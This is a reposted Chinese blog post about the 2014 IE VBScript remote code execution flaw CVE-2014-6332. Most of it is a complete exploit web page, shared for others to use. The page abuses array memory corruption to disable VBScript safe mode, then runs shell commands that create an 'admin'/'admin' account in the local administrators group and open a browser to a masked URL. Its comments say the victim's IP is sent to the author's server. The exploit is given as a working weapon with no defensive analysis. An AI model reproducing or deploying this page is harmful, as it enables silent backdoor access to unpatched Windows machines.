微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞(CVE-2014-6332),可以说是给windows吃了一颗大补丸。缺陷出现在VBScript的代码中,自Windows 95首次发布(19年前)以来就一直存在。袁哥的眼泪哗哗的。随便一个ie,必弹计算器。
关于微软安全补丁
微软披露了一个存在于所有Windows版本的高危漏洞。建议所有Windows用户,尤其是运行网站的用户应尽快安装微软周二发布的补丁。
POC之一:弹记事本(By yuange1975)
CVE-2014-6332 alliedve.htm allie(win95+ie3-win10+ie11) dve copy by yuange in 2009
利用最新的漏洞写了一个XX网页,所有的IE打开后都会新增一个admin的用户,密码也是admin,分享给大家。
我看到的漏洞说明:http://www.nigesb.com/cve-2014-6332-poc.html
测试截图
POC之二:执行CMD命令,并新增用户(By qiujianzhong)
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <!--[if !IE]><!--> 本网站目前只支持IE,请使用IE打开本页面 <!--<![endif]--><br><!--[if IE]> 对不起,你没有权限打开本页面,请联系管理员 <![endif]-->
<!--#####漏洞利用的前提:使用IE、未打漏洞的、未开360的############################################--><!--#####用IE打开该页面后,电脑将会新建一个admin的用户,密码也是admin,并将IP发给自己的服务器######--><!--#####创建隐藏帐号请参考http://www.vfocus.net/art/20090420/4976.html###########################--><!--##################### make by Anders #######################################-->
<!doctype html><html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><head></head><body> <SCRIPT LANGUAGE="VBScript"> function runmumaa()On Error Resume Nextset shell=createobject("wscript.shell")shell.run "net user admin admin /add",0shell.run "net localgroup administrators admin /add",0shell.run "iexplore"" http://www.***的网页.com",0end function </script> <SCRIPT LANGUAGE="VBScript">
dim aa()dim ab()dim a0
dim a1
dim a2
dim a3
dim win9x
dim intVersion
dim rnda
dim funclass
dim myarray
Begin() function Begin() On Error Resume Next info=Navigator.UserAgent
if(instr(info,"Win64")>0) then
exit function end if
if (instr(info,"MSIE")>0) then
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
else exit function
end if
win9x=0
BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
if(intVersion<4) then
document.write("<br> IE") document.write(intVersion) runshellcode()
else
setnotsafemode() end if end ifend function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5)end function function Create() On Error Resume Next dim i
Create=False For i = 0 To 400 If Over()=True Then ' document.write(i)
Create=True Exit For End If Nextend function
sub testaa()end sub
function mydata() On Error Resume Next i=testaa
i=null redim Preserve aa(a2)
ab(0)=0 aa(a1)=i
ab(0)=6.36598737437801E-314
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1) redim Preserve aa(a0)
end function
function setnotsafemode() On Error Resume Next i=mydata()
i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134)
for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then
j=0
redim Preserve aa(a2)
aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0)
j=0 j=readmemo(i+&h120+k)
Exit for end if
next
ab(2)=1.69759663316747E-313 runmumaa()end function function Over() On Error Resume Next dim type1,type2,type3
Over=False a0=a0+a3
a1=a0+2 a2=a0+&h8000000
redim Preserve aa(a0) redim ab(a0)
redim Preserve aa(a2)
type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10
If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1)) end if
end if else redim Preserve aa(a0) exit function
end if else if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if
end if end if end if
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then Over=True win9x=1 End If
redim Preserve aa(a0)
end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2)
ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313
ReadMemo=lenb(aa(a1))
ab(0)=0
redim Preserve aa(a0)end function </script> </body></html>
转载于:https://blog.51cto.com/3451836/1585643